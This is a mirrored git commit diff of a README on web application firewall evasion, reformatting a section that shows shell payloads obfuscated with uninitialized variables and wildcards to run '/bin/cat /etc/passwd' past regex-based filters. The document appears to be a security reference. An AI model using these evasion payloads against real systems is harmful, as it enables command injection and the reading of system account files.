mirror of
https://github.com/0xInfection/Awesome-WAF.git
synced 2024-10-01 04:35:35 -04:00
Some more markdown added.
This commit is contained in:
parent
709d0d10f4
commit
80823adb7f
11
README.md
11
README.md
@ -1725,23 +1725,22 @@ __11. Uninitialized Variables__
|
||||
|
||||
> __BONUS:__ Variable names can have any number of random characters. I have represented them here as `$aaaaaa`, `$bbbbbb`, and so on. You can replace them with any number of random chars like `$ushdjah` and so on. ;)
|
||||
|
||||
- Level 1 Obfuscation: Normal
|
||||
- __Level 1 Obfuscation__: Normal
|
||||
__Standard__: `/bin/cat /etc/passwd`
|
||||
__Obfuscated__: `/bin/cat$u /etc/passwd$u`
|
||||
|
||||
- Level 2 Obfuscation: Postion Based
|
||||
- __Level 2 Obfuscation__: Postion Based
|
||||
__Standard__: `/bin/cat /etc/passwd`
|
||||
__Obfuscated__: <code>$u<b>/bin</b>$u<b>/cat</b>$u $u<b>/etc</b>$u<b>/passwd</b>$u</code>
|
||||
|
||||
- Level 3 Obfuscation: Random chars
|
||||
- __Level 3 Obfuscation__: Random chars
|
||||
__Standard__: `/bin/cat /etc/passwd`
|
||||
__Obfuscated__: <code>$aaaaaa<b>/bin</b>$bbbbbb<b>/cat</b>$ccccccc $dddddd<b>/etc</b>$eeeeeee<b>/passwd</b>$fffffff</code>
|
||||
|
||||
An exotic payload crafted:
|
||||
|
||||
<code>
|
||||
```
|
||||
$sdijchkd<b>/???</b>$sdjhskdjh<b>/??t</b>$skdjfnskdj $sdofhsdhjs<b>/???</b>$osdihdhsdj<b>/??ss??</b>$skdjhsiudf
|
||||
</code>
|
||||
```
|
||||
|
||||
__12. Random Tabs__
|
||||
- Tabs often help to evade firewalls especially regex based ones.
|
||||
|
Loading…
Reference in New Issue
Block a user